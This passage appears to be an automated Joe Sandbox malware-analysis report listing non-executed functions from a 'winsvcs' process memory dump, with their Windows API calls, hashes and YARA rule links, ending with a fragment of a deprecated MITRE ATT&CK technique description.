Instruction Fuzzy Hash: 32E02D79D0420CAF8B55EFA8D54589CFBB5EB08210F1081AAEC58A7311EA31AA64DF91

Non-executed Functions

Function 0041411E Relevance: 56.5, APIs: 31, Strings: 1, Instructions: 454memorystringCOMMON

Download Yara Rule

APIs

RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 00414162
GetWindowLongA.USER32(?,000000FC), ref: 00414176
SetWindowLongA.USER32(?,000000FC,?), ref: 00414184
DestroyWindow.USER32(?), ref: 004141B0
IsWindow.USER32(?), ref: 004141B7
GetCurrentProcess.KERNEL32 ref: 00414206
FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00414214
SetWindowLongA.USER32(?,000000FC,?), ref: 00414220
GetParent.USER32(?), ref: 00414263
GetClassNameA.USER32(00000000,?,00000008), ref: 00414271
lstrcmp.KERNEL32(?,0043ACB4), ref: 00414281
GetSysColor.USER32(0000000F), ref: 0041428D
GetSysColor.USER32(00000005), ref: 00414297
GetWindowLongA.USER32(?,000000F0), ref: 004143A9
GetWindowLongA.USER32(?,000000F0), ref: 004143C4
SetWindowLongA.USER32(?,000000F0,00000000), ref: 004143D5
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 004143E7
VariantInit.OLEAUT32(?), ref: 0041444B
VariantClear.OLEAUT32(?), ref: 0041445D
SysAllocString.OLEAUT32(?), ref: 00414471
VariantClear.OLEAUT32(?), ref: 004144B1
VariantClear.OLEAUT32(?), ref: 004144BC
RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 004144FD
lstrlenW.KERNEL32(?,8007000E), ref: 004145A3
GlobalAlloc.KERNEL32(00000042,-0000000E), ref: 004145B0
GlobalFix.KERNEL32(00000000), ref: 004145D1
_memcpy_s.LIBCMT ref: 004145E2
GetWindowLongA.USER32(?,000000FC), ref: 004146A8
SetWindowLongA.USER32(?,000000FC,?), ref: 004146B6

Strings

4D, xrefs: 004142AA

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: Window$Long$Variant$Clear$AllocColorGlobalRedraw$CacheClassCurrentDestroyFlushInitInstructionNameParentProcessString_memcpy_slstrcmplstrlen
String ID: 4D
API String ID: 1509809736-4064760932
Opcode ID: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
Instruction ID: d33cbc65b261bd5f71919fcd58597f20de14d50e8eab0a0e342eb175f4602f49
Opcode Fuzzy Hash: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
Instruction Fuzzy Hash: 99028C71204205AFDB10CF24D848BABBBE5BF85714F14862AF859DB2A0D778DD81CB5A

Function 00410C90 Relevance: 25.6, APIs: 17, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00410CAC
RtlEnterCriticalSection.NTDLL(0044B340), ref: 00410CBA
RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00410CD3

Part of subcall function 00423370: RtlEnterCriticalSection.NTDLL(0044B340), ref: 00423381
Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB60), ref: 0042338C
Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB70), ref: 0042339C
Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACBC,00000030), ref: 004233BF
Part of subcall function 00423370: LoadCursorA.USER32(00000000,00007F00), ref: 00423402
Part of subcall function 00423370: RegisterClassExA.USER32(00000030), ref: 00423425
Part of subcall function 00423370: __recalloc.LIBCMT ref: 00423479
Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACC8,00000030), ref: 004234D9

FindResourceA.KERNEL32(0044B30C,00000081,00000005), ref: 00410CEC
FindResourceA.KERNEL32(0044B30C,00000081,000000F0), ref: 00410D07
LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D13
LockResource.KERNEL32(00000000), ref: 00410D1A
LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D28
LockResource.KERNEL32(00000000), ref: 00410D37
DialogBoxIndirectParamA.USER32(0044B30C,00000000,?,00411A10,00000000), ref: 00410D5C
GetLastError.KERNEL32 ref: 00410D71
GlobalHandle.KERNEL32(00000000), ref: 00410D7E
GlobalFree.KERNEL32(00000000), ref: 00410D85
SetLastError.KERNEL32(00000000), ref: 00410DA3
GetLastError.KERNEL32 ref: 00410DAB
GetLastError.KERNEL32 ref: 00410DBA
RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 00410DD4

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: Resource$ErrorLast$ClassCriticalLoadRegisterSection$ClipboardEnterFindFormatGlobalInfoLock$CurrentCursorDialogExceptionFreeHandleIndirectLeaveParamRaiseThread__recalloc
String ID:
API String ID: 825656904-0
Opcode ID: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
Instruction ID: f745feaec7197e157a37296f2868a76793427c604a9b77b08ca0e5f371f76add
Opcode Fuzzy Hash: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
Instruction Fuzzy Hash: A631D835241700BBD7201BB5BC8CAAB3B58EB49721B141A76FD11C2391DBF8DCC1866D

Function 00417549 Relevance: 10.6, APIs: 7, Instructions: 89COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 004175AD
SysStringLen.OLEAUT32 ref: 004175BA
SysStringLen.OLEAUT32 ref: 004175C7
_memcpy_s.LIBCMT ref: 004175E5

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: String$Free_memcpy_s
String ID:
API String ID: 2083054645-0
Opcode ID: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
Instruction ID: 1ce8d2cbe3debae867d133ec0a61dd978d441ec293a76d53af323acb72a7b2bb
Opcode Fuzzy Hash: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
Instruction Fuzzy Hash: D221F632208601AFE7105F24EC48B5BB7B9FF44724F144C2AF98493261C779DC81CB99

Function 0042B460 Relevance: 9.3, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 0042B561
__FindPESection.LIBCMT ref: 0042B57B

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
Instruction ID: c2943d19c9542f00f785555977c3dc5d60b80e9ec805d4403e1c04b136c06cca
Opcode Fuzzy Hash: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
Instruction Fuzzy Hash: 2C91D176B002258BCB14DF59F88076EB3B9EBC5314F95822AD815973A1E739EC01CBD8

Function 004290C5 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 004290ED

Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425802
Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425810

__getptd.LIBCMT ref: 004290F7

Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A

__getptd.LIBCMT ref: 00429105
__getptd.LIBCMT ref: 00429113
__getptd.LIBCMT ref: 0042911E
_CallCatchBlock2.LIBCMT ref: 00429144

Part of subcall function 00425899: __CallSettingFrame@12.LIBCMT ref: 004258E5

Part of subcall function 004291EB: __getptd.LIBCMT ref: 004291FA
Part of subcall function 004291EB: __getptd.LIBCMT ref: 00429208

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
Instruction ID: b999dcdba1427255f3dfb1c667b010caa462ff74c4b9d88451a5c342c024839a
Opcode Fuzzy Hash: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
Instruction Fuzzy Hash: 06111C71D00219DFDF00EFA5E945AAD7BB0FF04314F51806EF814A7251DB799A119F58

Function 004100C0 Relevance: 7.6, APIs: 5, Instructions: 125COMMONLIBRARYCODE

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00410127
std::_String_base::_Xlen.LIBCPMT ref: 004100D5

Part of subcall function 00423A4B: __EH_prolog3.LIBCMT ref: 00423A52
Part of subcall function 00423A4B: std::bad_exception::bad_exception.LIBCMT ref: 00423A6F
Part of subcall function 00423A4B: __CxxThrowException@8.LIBCMT ref: 00423A7D

std::_String_base::_Xlen.LIBCPMT ref: 0041014F
_memmove_s.LIBCMT ref: 0041018C
_memmove_s.LIBCMT ref: 004101D7

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: String_base::_Xlen_memmove_sstd::_$Exception@8H_prolog3Throw_memcpy_sstd::bad_exception::bad_exception
String ID:
API String ID: 2104318304-0
Opcode ID: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
Instruction ID: 86bfcc1c74f1fc0be6eeef633fbe502bd8068da502ff08f6d6f7ea803161ce8a
Opcode Fuzzy Hash: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
Instruction Fuzzy Hash: 2A41F671604A0ABFD314DE19DA80966B3B6FB81300B50872AD42547A42D7B9FDD4C7E9

Function 00418CB0 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044E240), ref: 00418CC0
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418D0E
RtlLeaveCriticalSection.NTDLL(0044E240), ref: 00418D52
RtlDeleteCriticalSection.NTDLL(0044E240), ref: 00418D65
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418DAB

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: CriticalSection$ExceptionRaise$DeleteEnterLeave
String ID:
API String ID: 2896116776-0
Opcode ID: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
Instruction ID: 78883e933ddfd575a463b6ae8765c2241207876390ae6ac4d6d0b6bdd00743fe
Opcode Fuzzy Hash: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
Instruction Fuzzy Hash: C241A7B26006149BEF50DF15FC85B5777A5EF50318F18C0AEE8098F246DB79E880CBA9

Function 00416D50 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(?,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DD1
GetFocus.USER32 ref: 00416DD9
IsChild.USER32(?,00000000), ref: 00416DE3
GetWindow.USER32(?,00000005), ref: 00416DF2
SetFocus.USER32(00000000,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DF9

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: Focus$ChildWindow
String ID:
API String ID: 501040988-0
Opcode ID: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
Instruction ID: 8b2d6c618c82d252263e44c6a5238523959aa71bdc741b18c4e8e08c9a1a1d5c
Opcode Fuzzy Hash: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
Instruction Fuzzy Hash: C7215070204248AFDB209F64DC08BAA7BA9EF49315F15455DF8498A290DB74DD41CB65

Function 00423CD9 Relevance: 7.6, APIs: 5, Instructions: 68memorylibraryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,00423DAF,00000000,00411A70), ref: 00423CDB
LoadLibraryA.KERNEL32(0043AE1C,00000000,00000000,?), ref: 00423CF4
RtlAllocateHeap.NTDLL(00000000), ref: 00423D50
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00423D66
HeapFree.KERNEL32(00000000), ref: 00423D76

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: Heap$AllocateCompareExchangeFeatureFreeInterlockedLibraryLoadPresentProcessor
String ID:
API String ID: 354369530-0
Opcode ID: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
Instruction ID: bad696d248039219c0635516f435c0c90e3ca1e931be28e5b90198828d8a9e0e
Opcode Fuzzy Hash: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
Instruction Fuzzy Hash: C7116375750211AFEB209F76EC88A1737B9FB49742B54543AE501D3250D778DC01CB68

Function 0042592A Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00425948

Part of subcall function 00429CB8: __mtinitlocknum.LIBCMT ref: 00429CCE
Part of subcall function 00429CB8: __amsg_exit.LIBCMT ref: 00429CDA
Part of subcall function 00429CB8: RtlEnterCriticalSection.NTDLL(004282ED), ref: 00429CE2

___sbh_find_block.LIBCMT ref: 00425953
___sbh_free_block.LIBCMT ref: 00425962
HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
Instruction ID: 784fe8f7d40001f7600859eb2be024fca0bf4e15d789c35dff29e27069072cfd
Opcode Fuzzy Hash: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
Instruction Fuzzy Hash: 0A014471B05622EAEF206B72BD0975E76A49F00735FE5411FF404661D1CA7C89818A5D

Function 0040F841 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F84B
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F85B
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F863
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F86F
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F87E

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
Instruction ID: f30965056506db091dc390cd5668a26ed455dcdbe33213fe5701eb603ec7fe18
Opcode Fuzzy Hash: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
Instruction Fuzzy Hash: 08E042B1289614BBF65117B06C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D

Function 0040F476 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F480
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F490
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F498
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4A4
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4B3

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
Instruction ID: d2405f4d686cc329cb2c4974dd0d75fc30c27e1cdd077f1fd0386077d6bea2a0
Opcode Fuzzy Hash: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
Instruction Fuzzy Hash: D7E04C712996147AF65117B05C4EFFA352DAB15B01F105420F792E91D0CAF85C42477D

Function 0040F42E Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F438
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F448
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F450
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F45C
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F46B

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
Instruction ID: aa7bb90587d74c23307c61ea89b22b129a7fc36b7eb487b4901722fb63985b8b
Opcode Fuzzy Hash: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
Instruction Fuzzy Hash: 38E04C712896147AF65117B05C4EFFA352DAB14B01F105420F792E91D1CAF86C42477D

Function 0040F8DD Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F8E7
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8F7
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F8FF
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F90B
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F91A

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
Instruction ID: 490ac9be3a4df3e6166b8d436346df579d9a1bad408d84ec1039d8251566a421
Opcode Fuzzy Hash: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
Instruction Fuzzy Hash: 3FE042B1289614BAF65117B05C4EFFB362DEB14B02F106420F792E91D0CAF86C428B7D

Function 0040F889 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F893
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8A9
GetModuleHandleA.KERNEL32(00000000), ref: 0040F8B1
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F8BD
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F8D2

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
Instruction ID: 660c769eb77b366a8a23f818950a586be316288a064137e639420a7e0a5f472a
Opcode Fuzzy Hash: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
Instruction Fuzzy Hash: 5FE0BF71288300BBF66117709C0EFEB362DE714B02F105420F796E51E0CAF55C419B2D

Function 0040F4BE Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F4C8
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F4D8
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F4E0
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4EC
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4FB

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
Instruction ID: 5c5ea486f8d86452672809949b6ea6ac6bdc788aae214913a2807fc9deb95fd5
Opcode Fuzzy Hash: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
Instruction Fuzzy Hash: 65E04C71299614BAF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF95C42477D

Function 0040F54E Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F558
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F568
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F570
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F57C
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F58B

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
Instruction ID: 4336a379e938bec1e0ea5ab87b831ef1b692dabbd56aec1cc90c95ce917f6d54
Opcode Fuzzy Hash: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
Instruction Fuzzy Hash: 10E04C712896147AF65117B05C4EFFA352DAB14B01F105420F796E91D0CAF85C42477D

Function 0040F96D Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F977
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F987
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F98F
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F99B
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F9AA

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
Instruction ID: 855d6a06f1f245b68fde2b1a20fd1fb7be06e334370c2da90505ec6d8b0432c5
Opcode Fuzzy Hash: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
Instruction Fuzzy Hash: F9E04CB12896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF85D42477D

Function 0040F506 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F510
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F520
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F528
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F534
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F543

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
Instruction ID: 137df8c84f76daae2b18901c05a7a40a4d47098fd36d39e3025c756ee9ed29a4
Opcode Fuzzy Hash: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
Instruction Fuzzy Hash: BCE042B1288304BAF65017B05C4EFBA362DA714B02F106820B792E91D1CAF8AC428B3D

Function 0040F925 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F92F
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F93F
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F947
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F953
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F962

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
Instruction ID: c34b6a3563cd7af2964a3b0a4b55fe3fcf32e415c952ee7c54061f4af326a4b5
Opcode Fuzzy Hash: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
Instruction Fuzzy Hash: D1E042B1289714BAF65117B05C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D

Function 00415099 Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 004150E7
lstrlenW.KERNEL32(?), ref: 00415103
lstrlenW.KERNEL32(?), ref: 00415121
_memcpy_s.LIBCMT ref: 0041512F

Memory Dump Source

Source File: 0000000E.00000002.2873485076.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_40b000_winsvcs.jbxd

Similarity

API ID: lstrlen$String_memcpy_s
String ID:
API String ID: 1108949412-0
Opcode ID: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
Instruction ID: dca89a99140dcdefd2515e70e36f7115f501ce712d998d2b27d11117e8ebcf95
Opcode Fuzzy Hash: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
Instruction Fuzzy Hash: 95219233305516AFD7209B15FC84FEBF7A8FBD5325F01456BF5048A210D636D89287A4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

